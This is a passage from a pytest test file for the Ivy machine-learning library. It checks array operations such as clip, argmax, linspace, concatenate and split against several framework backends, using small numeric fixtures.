assert ivy.is_array(x0)
assert ivy.is_array(x1)
assert isinstance(res, bool) or ivy.is_array(res)
# value test
assert res == true_res
# compilation test
if not ivy.array_mode():
helpers.assert_compilable(ivy.array_equal)
# arrays_equal
@pytest.mark.parametrize(
"xs_n_res", [([[[0.], [1.]], [[0.], [1.]], [[1.], [2.]]], False)])
@pytest.mark.parametrize(
"dtype", ['float32'])
def test_arrays_equal(xs_n_res, dtype, dev, call):
xs, true_res = xs_n_res
# smoke test
x0 = ivy.array(xs[0], dtype, dev)
x1 = ivy.array(xs[1], dtype, dev)
x2 = ivy.array(xs[2], dtype, dev)
res = ivy.arrays_equal([x0, x1, x2])
# type test
assert ivy.is_array(x0)
assert ivy.is_array(x1)
assert ivy.is_array(x2)
assert isinstance(res, bool) or ivy.is_array(res)
# value test
assert res == true_res
# compilation test
if not ivy.array_mode():
helpers.assert_compilable(ivy.array_equal)
# equal
@pytest.mark.parametrize(
"x0_n_x1_n_x2_em_n_res", [([0.], [0.], [0.], False, True),
([0.], [1.], [0.], False, False),
([0.], [1.], [0.], True, [[True, False, True],
[False, True, False],
[True, False, True]]),
({'a': 0}, {'a': 0}, {'a': 1}, True, [[True, True, False],
[True, True, False],
[False, False, True]])])
@pytest.mark.parametrize(
"to_array", [True, False])
def test_equal(x0_n_x1_n_x2_em_n_res, to_array, dev, call):
x0, x1, x2, equality_matrix, true_res = x0_n_x1_n_x2_em_n_res
# smoke test
if isinstance(x0, list) and to_array:
x0 = ivy.array(x0, dev=dev)
x1 = ivy.array(x1, dev=dev)
x2 = ivy.array(x2, dev=dev)
res = ivy.equal(x0, x1, x2, equality_matrix=equality_matrix)
# value test
if equality_matrix:
assert np.array_equal(ivy.to_numpy(res), np.array(true_res))
else:
assert res == true_res
# compilation test
if call in [helpers.torch_call]:
# pytorch scripting does not support variable number of input arguments
return
if not ivy.array_mode():
helpers.assert_compilable(ivy.equal)
# to_numpy
@pytest.mark.parametrize(
"object_in", [[], [0.], [1], [True], [[1., 2.]]])
@pytest.mark.parametrize(
"dtype", [None, 'float16', 'float32', 'float64', 'int8', 'int16', 'int32', 'int64', 'bool'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array])
def test_to_numpy(object_in, dtype, tensor_fn, dev, call):
if call in [helpers.mx_call] and dtype == 'int16':
# mxnet does not support int16
pytest.skip()
if call in [helpers.tf_graph_call]:
# to_numpy() requires eager execution
pytest.skip()
# smoke test
ret = ivy.to_numpy(tensor_fn(object_in, dtype, dev))
# type test
assert isinstance(ret, np.ndarray)
# cardinality test
assert ret.shape == np.array(object_in).shape
# value test
assert np.allclose(ivy.to_numpy(tensor_fn(object_in, dtype, dev)), np.array(object_in).astype(dtype))
# compilation test
if call in [helpers.torch_call]:
# pytorch scripting does not support numpy conversion
return
if not ivy.array_mode():
helpers.assert_compilable(ivy.to_numpy)
# to_scalar
@pytest.mark.parametrize(
"object_in", [[0.], [[[1]]], [True], [[1.]]])
@pytest.mark.parametrize(
"dtype", [None, 'float16', 'float32', 'float64', 'int8', 'int16', 'int32', 'int64', 'bool'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array])
def test_to_scalar(object_in, dtype, tensor_fn, dev, call):
if call in [helpers.mx_call] and dtype == 'int16':
# mxnet does not support int16
pytest.skip()
if call in [helpers.tf_graph_call]:
# to_scalar() requires eager execution
pytest.skip()
# smoke test
ret = ivy.to_scalar(tensor_fn(object_in, dtype, dev))
true_val = ivy.to_numpy(ivy.array(object_in, dtype=dtype)).item()
# type test
assert isinstance(ret, type(true_val))
# value test
assert ivy.to_scalar(tensor_fn(object_in, dtype, dev)) == true_val
# compilation test
if call in [helpers.torch_call]:
# pytorch scripting does not support scalar conversion
return
if not ivy.array_mode():
helpers.assert_compilable(ivy.to_scalar)
# to_list
@pytest.mark.parametrize(
"object_in", [[], [0.], [1], [True], [[1., 2.]]])
@pytest.mark.parametrize(
"dtype", [None, 'float16', 'float32', 'float64', 'int8', 'int16', 'int32', 'int64', 'bool'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array])
def test_to_list(object_in, dtype, tensor_fn, dev, call):
if call in [helpers.mx_call] and dtype == 'int16':
# mxnet does not support int16
pytest.skip()
if call in [helpers.tf_graph_call]:
# to_list() requires eager execution
pytest.skip()
# smoke test
ret = ivy.to_list(tensor_fn(object_in, dtype, dev))
# type test
assert isinstance(ret, list)
# cardinality test
assert _get_shape_of_list(ret) == _get_shape_of_list(object_in)
# value test
assert np.allclose(np.asarray(ivy.to_list(tensor_fn(object_in, dtype, dev))),
np.array(object_in).astype(dtype))
# compilation test
if call in [helpers.torch_call]:
# pytorch scripting does not support list conversion
return
if not ivy.array_mode():
helpers.assert_compilable(ivy.to_list)
# shape
@pytest.mark.parametrize(
"object_in", [[], [0.], [1], [True], [[1., 2.]]])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"as_tensor", [None, True, False])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_shape(object_in, dtype, as_tensor, tensor_fn, dev, call):
# smoke test
if len(object_in) == 0 and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
ret = ivy.shape(tensor_fn(object_in, dtype, dev), as_tensor)
# type test
if as_tensor:
assert ivy.is_array(ret)
else:
assert isinstance(ret, tuple)
ret = ivy.array(ret)
# cardinality test
assert ret.shape[0] == len(np.asarray(object_in).shape)
# value test
assert np.array_equal(ivy.to_numpy(ret), np.asarray(np.asarray(object_in).shape, np.int32))
# compilation test
if call in [helpers.torch_call]:
# pytorch scripting does not support Union
return
if not ivy.array_mode():
helpers.assert_compilable(ivy.shape)
# get_num_dims
@pytest.mark.parametrize(
"object_in", [[], [0.], [1], [True], [[1., 2.]]])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"as_tensor", [None, True, False])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_get_num_dims(object_in, dtype, as_tensor, tensor_fn, dev, call):
# smoke test
if len(object_in) == 0 and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
ret = ivy.get_num_dims(tensor_fn(object_in, dtype, dev), as_tensor)
# type test
if as_tensor:
assert ivy.is_array(ret)
else:
assert isinstance(ret, int)
ret = ivy.array(ret)
# cardinality test
assert list(ret.shape) == []
# value test
assert np.array_equal(ivy.to_numpy(ret), np.asarray(len(np.asarray(object_in).shape), np.int32))
# compilation test
if call in [helpers.torch_call]:
# pytorch scripting does not support Union
return
if not ivy.array_mode():
helpers.assert_compilable(ivy.shape)
# minimum
@pytest.mark.parametrize(
"xy", [([0.7], [0.5]), ([0.7], 0.5), (0.5, [0.7]), ([[0.8, 1.2], [1.5, 0.2]], [0., 1.])])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_minimum(xy, dtype, tensor_fn, dev, call):
# smoke test
if (isinstance(xy[0], Number) or isinstance(xy[1], Number))\
and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(xy[0], dtype, dev)
y = tensor_fn(xy[1], dtype, dev)
ret = ivy.minimum(x, y)
# type test
assert ivy.is_array(ret)
# cardinality test
if len(x.shape) > len(y.shape):
assert ret.shape == x.shape
else:
assert ret.shape == y.shape
# value test
assert np.array_equal(call(ivy.minimum, x, y), np.asarray(ivy.functional.backends.numpy.minimum(ivy.to_numpy(x), ivy.to_numpy(y))))
# compilation test
if not ivy.array_mode():
helpers.assert_compilable(ivy.minimum)
# maximum
@pytest.mark.parametrize(
"xy", [([0.7], [0.5]), ([0.7], 0.5), (0.5, [0.7]), ([[0.8, 1.2], [1.5, 0.2]], [0., 1.])])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_maximum(xy, dtype, tensor_fn, dev, call):
# smoke test
if (isinstance(xy[0], Number) or isinstance(xy[1], Number))\
and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(xy[0], dtype, dev)
y = tensor_fn(xy[1], dtype, dev)
ret = ivy.maximum(x, y)
# type test
assert ivy.is_array(ret)
# cardinality test
if len(x.shape) > len(y.shape):
assert ret.shape == x.shape
else:
assert ret.shape == y.shape
# value test
assert np.array_equal(call(ivy.maximum, x, y), np.asarray(ivy.functional.backends.numpy.maximum(ivy.to_numpy(x), ivy.to_numpy(y))))
# compilation test
if not ivy.array_mode():
helpers.assert_compilable(ivy.maximum)
# clip
@pytest.mark.parametrize(
"x_min_n_max", [(-0.5, 0., 1.5), ([1.7], [0.5], [1.1]), ([[0.8, 2.2], [1.5, 0.2]], 0.2, 1.4),
([[0.8, 2.2], [1.5, 0.2]], [[1., 1.], [1., 1.]], [[1.1, 2.], [1.1, 2.]])])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_clip(x_min_n_max, dtype, tensor_fn, dev, call):
# smoke test
if (isinstance(x_min_n_max[0], Number) or isinstance(x_min_n_max[1], Number) or isinstance(x_min_n_max[2], Number))\
and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(x_min_n_max[0], dtype, dev)
min_val = tensor_fn(x_min_n_max[1], dtype, dev)
max_val = tensor_fn(x_min_n_max[2], dtype, dev)
if ((min_val.shape != [] and min_val.shape != [1]) or (max_val.shape != [] and max_val.shape != [1]))\
and call in [helpers.mx_call]:
# mxnet only supports numbers or 0 or 1 dimensional arrays for min and max while performing clip
pytest.skip()
ret = ivy.clip(x, min_val, max_val)
# type test
assert ivy.is_array(ret)
# cardinality test
max_shape = max([x.shape, min_val.shape, max_val.shape], key=lambda x_: len(x_))
assert ret.shape == max_shape
# value test
assert np.array_equal(call(ivy.clip, x, min_val, max_val),
np.asarray(ivy.functional.backends.numpy.clip(ivy.to_numpy(x), ivy.to_numpy(min_val), ivy.to_numpy(max_val))))
# compilation test
if not ivy.array_mode():
helpers.assert_compilable(ivy.clip)
# clip_vector_norm
@pytest.mark.parametrize(
"x_max_norm_n_p_val_clipped",
[(-0.5, 0.4, 2., -0.4), ([1.7], 1.5, 3., [1.5]),
([[0.8, 2.2], [1.5, 0.2]], 4., 1., [[0.6808511, 1.8723406], [1.2765958, 0.17021278]]),
([[0.8, 2.2], [1.5, 0.2]], 2.5, 2., [[0.71749604, 1.9731141], [1.345305, 0.17937401]])])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_clip_vector_norm(x_max_norm_n_p_val_clipped, dtype, tensor_fn, dev, call):
# smoke test
if call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(x_max_norm_n_p_val_clipped[0], dtype, dev)
max_norm = x_max_norm_n_p_val_clipped[1]
p_val = x_max_norm_n_p_val_clipped[2]
clipped = x_max_norm_n_p_val_clipped[3]
ret = ivy.clip_vector_norm(x, max_norm, p_val)
# type test
assert ivy.is_array(ret)
# cardinality test
assert ret.shape == (x.shape if len(x.shape) else (1,))
# value test
assert np.allclose(call(ivy.clip_vector_norm, x, max_norm, p_val), np.array(clipped))
# compilation test
if call is helpers.torch_call:
# pytorch jit cannot compile global variables, in this case MIN_DENOMINATOR
return
if not ivy.array_mode():
helpers.assert_compilable(ivy.clip_vector_norm)
# round
@pytest.mark.parametrize(
"x_n_x_rounded", [(-0.51, -1), ([1.7], [2.]), ([[0.8, 2.2], [1.51, 0.2]], [[1., 2.], [2., 0.]])])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_round(x_n_x_rounded, dtype, tensor_fn, dev, call):
# smoke test
if (isinstance(x_n_x_rounded[0], Number) or isinstance(x_n_x_rounded[1], Number))\
and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(x_n_x_rounded[0], dtype, dev)
ret = ivy.round(x)
# type test
assert ivy.is_array(ret)
# cardinality test
assert ret.shape == x.shape
# value test
assert np.array_equal(call(ivy.round, x), np.array(x_n_x_rounded[1]))
# compilation test
if not ivy.array_mode():
helpers.assert_compilable(ivy.round)
# floormod
@pytest.mark.parametrize(
"x_n_divisor_n_x_floormod", [(2.5, 2., 0.5), ([10.7], [5.], [0.7]),
([[0.8, 2.2], [1.7, 0.2]], [[0.3, 0.5], [0.4, 0.11]], [[0.2, 0.2], [0.1, 0.09]])])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_floormod(x_n_divisor_n_x_floormod, dtype, tensor_fn, dev, call):
# smoke test
if (isinstance(x_n_divisor_n_x_floormod[0], Number) or isinstance(x_n_divisor_n_x_floormod[1], Number) or
isinstance(x_n_divisor_n_x_floormod[2], Number))\
and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(x_n_divisor_n_x_floormod[0], dtype, dev)
divisor = ivy.array(x_n_divisor_n_x_floormod[1], dtype, dev)
ret = ivy.floormod(x, divisor)
# type test
assert ivy.is_array(ret)
# cardinality test
assert ret.shape == x.shape
# value test
assert np.allclose(call(ivy.floormod, x, divisor), np.array(x_n_divisor_n_x_floormod[2]))
# compilation test
if not ivy.array_mode():
helpers.assert_compilable(ivy.floormod)
# floor
@pytest.mark.parametrize(
"x_n_x_floored", [(2.5, 2.), ([10.7], [10.]), ([[3.8, 2.2], [1.7, 0.2]], [[3., 2.], [1., 0.]])])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_floor(x_n_x_floored, dtype, tensor_fn, dev, call):
# smoke test
if (isinstance(x_n_x_floored[0], Number) or isinstance(x_n_x_floored[1], Number))\
and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(x_n_x_floored[0], dtype, dev)
ret = ivy.floor(x)
# type test
assert ivy.is_array(ret)
# cardinality test
assert ret.shape == x.shape
# value test
assert np.allclose(call(ivy.floor, x), np.array(x_n_x_floored[1]))
# compilation test
if not ivy.array_mode():
helpers.assert_compilable(ivy.floor)
# ceil
@pytest.mark.parametrize(
"x_n_x_ceiled", [(2.5, 3.), ([10.7], [11.]), ([[3.8, 2.2], [1.7, 0.2]], [[4., 3.], [2., 1.]])])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_ceil(x_n_x_ceiled, dtype, tensor_fn, dev, call):
# smoke test
if (isinstance(x_n_x_ceiled[0], Number) or isinstance(x_n_x_ceiled[1], Number))\
and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(x_n_x_ceiled[0], dtype, dev)
ret = ivy.ceil(x)
# type test
assert ivy.is_array(ret)
# cardinality test
assert ret.shape == x.shape
# value test
assert np.allclose(call(ivy.ceil, x), np.array(x_n_x_ceiled[1]))
# compilation test
if not ivy.array_mode():
helpers.assert_compilable(ivy.ceil)
# abs
@pytest.mark.parametrize(
"x_n_x_absed", [(-2.5, 2.5), ([-10.7], [10.7]), ([[-3.8, 2.2], [1.7, -0.2]], [[3.8, 2.2], [1.7, 0.2]])])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_abs(x_n_x_absed, dtype, tensor_fn, dev, call):
# smoke test
if (isinstance(x_n_x_absed[0], Number) or isinstance(x_n_x_absed[1], Number))\
and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(x_n_x_absed[0], dtype, dev)
ret = ivy.abs(x)
# type test
assert ivy.is_array(ret)
# cardinality test
assert ret.shape == x.shape
# value test
assert np.allclose(call(ivy.abs, x), np.array(x_n_x_absed[1]))
# compilation test
if not ivy.array_mode():
helpers.assert_compilable(ivy.abs)
# argmax
@pytest.mark.parametrize(
"x_n_axis_x_argmax", [([-0.3, 0.1], None, [1]), ([[1.3, 2.6], [2.3, 2.5]], 0, [1, 0]),
([[1.3, 2.6], [2.3, 2.5]], 1, [1, 1])])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_argmax(x_n_axis_x_argmax, dtype, tensor_fn, dev, call):
# smoke test
x = ivy.array(x_n_axis_x_argmax[0], dtype, dev)
axis = x_n_axis_x_argmax[1]
ret = ivy.argmax(x, axis)
# type test
assert ivy.is_array(ret)
# cardinality test
assert tuple(ret.shape) == (len(x.shape),)
# value test
assert np.allclose(call(ivy.argmax, x, axis), np.array(x_n_axis_x_argmax[2]))
# compilation test
if not ivy.array_mode():
helpers.assert_compilable(ivy.argmax)
# argmin
@pytest.mark.parametrize(
"x_n_axis_x_argmin", [([-0.3, 0.1], None, [0]), ([[1.3, 2.6], [2.3, 2.5]], 0, [0, 1]),
([[1.3, 2.6], [2.3, 2.5]], 1, [0, 0])])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_argmin(x_n_axis_x_argmin, dtype, tensor_fn, dev, call):
# smoke test
x = tensor_fn(x_n_axis_x_argmin[0], dtype, dev)
axis = x_n_axis_x_argmin[1]
ret = ivy.argmin(x, axis)
# type test
assert ivy.is_array(ret)
# cardinality test
assert tuple(ret.shape) == (len(x.shape),)
# value test
assert np.allclose(call(ivy.argmin, x, axis), np.array(x_n_axis_x_argmin[2]))
# compilation test
if not ivy.array_mode():
helpers.assert_compilable(ivy.argmin)
# argsort
@pytest.mark.parametrize(
"x_n_axis_x_argsort", [([1, 10, 26.9, 2.8, 166.32, 62.3], -1, [0, 3, 1, 2, 5, 4])])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_argsort(x_n_axis_x_argsort, dtype, tensor_fn, dev, call):
# smoke test
x = tensor_fn(x_n_axis_x_argsort[0], dtype, dev)
axis = x_n_axis_x_argsort[1]
ret = ivy.argsort(x, axis)
# type test
assert ivy.is_array(ret)
# cardinality test
assert tuple(ret.shape) == (6,)
# value test
assert np.allclose(call(ivy.argsort, x, axis), np.array(x_n_axis_x_argsort[2]))
# compilation test
if not ivy.array_mode():
helpers.assert_compilable(ivy.argsort)
# arange
@pytest.mark.parametrize(
"stop_n_start_n_step", [[10, None, None], [10, 2, None], [10, 2, 2]])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_arange(stop_n_start_n_step, dtype, tensor_fn, dev, call):
# smoke test
stop, start, step = stop_n_start_n_step
if (isinstance(stop, Number) or isinstance(start, Number) or isinstance(step, Number))\
and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
if tensor_fn == helpers.var_fn and call is helpers.torch_call:
# pytorch does not support arange using variables as input
pytest.skip()
args = list()
if stop:
stop = tensor_fn(stop, dtype, dev)
args.append(stop)
if start:
start = tensor_fn(start, dtype, dev)
args.append(start)
if step:
step = tensor_fn(step, dtype, dev)
args.append(step)
ret = ivy.arange(*args, dtype=dtype, dev=dev)
# type test
assert ivy.is_array(ret)
# cardinality test
assert ret.shape == (int((ivy.to_list(stop) -
(ivy.to_list(start) if start else 0))/(ivy.to_list(step) if step else 1)),)
# value test
assert np.array_equal(call(ivy.arange, *args, dtype=dtype, dev=dev),
np.asarray(ivy.functional.backends.numpy.arange(*[ivy.to_numpy(arg) for arg in args], dtype=dtype)))
# compilation test
if call in [helpers.torch_call]:
# pytorch scripting does not support Number type, or Union for Union[float, int] etc.
return
if not ivy.array_mode():
helpers.assert_compilable(ivy.arange)
# linspace
@pytest.mark.parametrize(
"start_n_stop_n_num_n_axis", [[1, 10, 100, None], [[[0., 1., 2.]], [[1., 2., 3.]], 150, -1],
[[[[-0.1471, 0.4477, 0.2214]]], [[[-0.3048, 0.3308, 0.2721]]], 6, -2]])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_linspace(start_n_stop_n_num_n_axis, dtype, tensor_fn, dev, call):
# smoke test
start, stop, num, axis = start_n_stop_n_num_n_axis
if (isinstance(start, Number) or isinstance(stop, Number))\
and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
start = tensor_fn(start, dtype, dev)
stop = tensor_fn(stop, dtype, dev)
ret = ivy.linspace(start, stop, num, axis, dev=dev)
# type test
assert ivy.is_array(ret)
# cardinality test
target_shape = list(start.shape)
target_shape.insert(axis + 1 if (axis and axis != -1) else len(target_shape), num)
assert ret.shape == tuple(target_shape)
# value test
assert np.allclose(call(ivy.linspace, start, stop, num, axis, dev=dev),
np.asarray(ivy.functional.backends.numpy.linspace(ivy.to_numpy(start), ivy.to_numpy(stop), num, axis)))
# compilation test
if call in [helpers.torch_call]:
# pytorch scripting does not support numpy conversion
return
if not ivy.array_mode():
helpers.assert_compilable(ivy.linspace)
# logspace
@pytest.mark.parametrize(
"start_n_stop_n_num_n_base_n_axis", [[1, 10, 100, 10., None], [[[0., 1., 2.]], [[1., 2., 3.]], 150, 2., -1],
[[[[-0.1471, 0.4477, 0.2214]]], [[[-0.3048, 0.3308, 0.2721]]], 6, 5., -2]])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_logspace(start_n_stop_n_num_n_base_n_axis, dtype, tensor_fn, dev, call):
# smoke test
start, stop, num, base, axis = start_n_stop_n_num_n_base_n_axis
if (isinstance(start, Number) or isinstance(stop, Number))\
and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
start = tensor_fn(start, dtype, dev)
stop = tensor_fn(stop, dtype, dev)
ret = ivy.logspace(start, stop, num, base, axis, dev=dev)
# type test
assert ivy.is_array(ret)
# cardinality test
target_shape = list(start.shape)
target_shape.insert(axis + 1 if (axis and axis != -1) else len(target_shape), num)
assert ret.shape == tuple(target_shape)
# value test
assert np.allclose(call(ivy.logspace, start, stop, num, base, axis, dev=dev),
ivy.functional.backends.numpy.logspace(ivy.to_numpy(start), ivy.to_numpy(stop), num, base, axis))
# compilation test
if call in [helpers.torch_call]:
# pytorch scripting does not support numpy conversion
return
if not ivy.array_mode():
helpers.assert_compilable(ivy.logspace)
# concatenate
@pytest.mark.parametrize(
"x1_n_x2_n_axis", [(1, 10, 0), ([[0., 1., 2.]], [[1., 2., 3.]], 0), ([[0., 1., 2.]], [[1., 2., 3.]], 1),
([[[-0.1471, 0.4477, 0.2214]]], [[[-0.3048, 0.3308, 0.2721]]], -1)])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_concatenate(x1_n_x2_n_axis, dtype, tensor_fn, dev, call):
# smoke test
x1, x2, axis = x1_n_x2_n_axis
if (isinstance(x1, Number) or isinstance(x2, Number)) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x1 = tensor_fn(x1, dtype, dev)
x2 = tensor_fn(x2, dtype, dev)
ret = ivy.concatenate((x1, x2), axis)
# type test
assert ivy.is_array(ret)
# cardinality test
axis_val = (axis % len(x1.shape) if (axis is not None and len(x1.shape) != 0) else len(x1.shape) - 1)
if x1.shape == ():
expected_shape = (2,)
else:
expected_shape = tuple([item * 2 if i == axis_val else item for i, item in enumerate(x1.shape)])
assert ret.shape == expected_shape
# value test
assert np.allclose(call(ivy.concatenate, [x1, x2], axis),
np.asarray(ivy.functional.backends.numpy.concatenate([ivy.to_numpy(x1), ivy.to_numpy(x2)], axis)))
# compilation test
if not ivy.array_mode():
helpers.assert_compilable(ivy.concatenate)
# flip
@pytest.mark.parametrize(
"x_n_axis_n_bs", [(1, 0, None), ([[0., 1., 2.]], None, (1, 3)), ([[0., 1., 2.]], 1, (1, 3)),
([[[-0.1471, 0.4477, 0.2214]]], None, None)])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_flip(x_n_axis_n_bs, dtype, tensor_fn, dev, call):
# smoke test
x, axis, bs = x_n_axis_n_bs
if isinstance(x, Number) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(x, dtype, dev)
ret = ivy.flip(x, axis, bs)
# type test
assert ivy.is_array(ret)
# cardinality test
assert ret.shape == x.shape
# value test
assert np.allclose(call(ivy.flip, x, axis, bs), np.asarray(ivy.functional.backends.numpy.flip(ivy.to_numpy(x), axis, bs)))
# compilation test
if not ivy.array_mode():
helpers.assert_compilable(ivy.flip)
# stack
@pytest.mark.parametrize(
"xs_n_axis", [((1, 0), -1), (([[0., 1., 2.]], [[3., 4., 5.]]), 0), (([[0., 1., 2.]], [[3., 4., 5.]]), 1)])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_stack(xs_n_axis, dtype, tensor_fn, dev, call):
# smoke test
(x1, x2), axis = xs_n_axis
if (isinstance(x1, Number) or isinstance(x2, Number)) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x1 = tensor_fn(x1, dtype, dev)
x2 = tensor_fn(x2, dtype, dev)
ret = ivy.stack((x1, x2), axis)
# type test
assert ivy.is_array(ret)
# cardinality test
axis_val = (axis % len(x1.shape) if (axis is not None and len(x1.shape) != 0) else len(x1.shape) - 1)
if x1.shape == ():
expected_shape = (2,)
else:
expected_shape = list(x1.shape)
expected_shape.insert(axis_val, 2)
assert ret.shape == tuple(expected_shape)
# value test
assert np.allclose(call(ivy.stack, (x1, x2), axis),
np.asarray(ivy.functional.backends.numpy.stack((ivy.to_numpy(x1), ivy.to_numpy(x2)), axis)))
# compilation test
if not ivy.array_mode():
helpers.assert_compilable(ivy.stack)
# unstack
@pytest.mark.parametrize(
"x_n_axis", [(1, -1), ([[0., 1., 2.]], 0), ([[0., 1., 2.]], 1)])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_unstack(x_n_axis, dtype, tensor_fn, dev, call):
# smoke test
x, axis = x_n_axis
if isinstance(x, Number) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(x, dtype, dev)
ret = ivy.unstack(x, axis)
# type test
assert isinstance(ret, list)
# cardinality test
axis_val = (axis % len(x.shape) if (axis is not None and len(x.shape) != 0) else len(x.shape) - 1)
if x.shape == ():
expected_shape = ()
else:
expected_shape = list(x.shape)
expected_shape.pop(axis_val)
assert ret[0].shape == tuple(expected_shape)
# value test
assert np.allclose(call(ivy.unstack, x, axis), np.asarray(ivy.functional.backends.numpy.unstack(ivy.to_numpy(x), axis)))
# compilation test
if not ivy.array_mode():
helpers.assert_compilable(ivy.unstack)
# split
@pytest.mark.parametrize(
"x_n_noss_n_axis_n_wr", [(1, 1, -1, False),
([[0., 1., 2., 3.]], 2, 1, False),
([[0., 1., 2.], [3., 4., 5.]], 2, 0, False),
([[0., 1., 2.], [3., 4., 5.]], 2, 1, True),
([[0., 1., 2.], [3., 4., 5.]], [2, 1], 1, False)])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_split(x_n_noss_n_axis_n_wr, dtype, tensor_fn, dev, call):
# smoke test
x, num_or_size_splits, axis, with_remainder = x_n_noss_n_axis_n_wr
if isinstance(x, Number) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(x, dtype, dev)
ret = ivy.split(x, num_or_size_splits, axis, with_remainder)
# type test
assert isinstance(ret, list)
# cardinality test
axis_val = (axis % len(x.shape) if (axis is not None and len(x.shape) != 0) else len(x.shape) - 1)
if x.shape == ():
expected_shape = ()
elif isinstance(num_or_size_splits, int):
expected_shape = tuple([math.ceil(item/num_or_size_splits) if i == axis_val else item
for i, item in enumerate(x.shape)])
else:
expected_shape = tuple([num_or_size_splits[0] if i == axis_val else item for i, item in enumerate(x.shape)])
assert ret[0].shape == expected_shape
# value test
pred_split = call(ivy.split, x, num_or_size_splits, axis, with_remainder)
true_split = ivy.functional.backends.numpy.split(ivy.to_numpy(x), num_or_size_splits, axis, with_remainder)
for pred, true in zip(pred_split, true_split):
assert np.allclose(pred, true)
# compilation test
if call is helpers.torch_call:
# pytorch scripting does not support Union or Numbers for type hinting
return
if not ivy.array_mode():
helpers.assert_compilable(ivy.split)
# repeat
@pytest.mark.parametrize(
"x_n_reps_n_axis", [(1, [1], 0), (1, 2, -1), (1, [2], None), ([[0., 1., 2., 3.]], (2, 1, 0, 3), -1)])
@pytest.mark.parametrize(
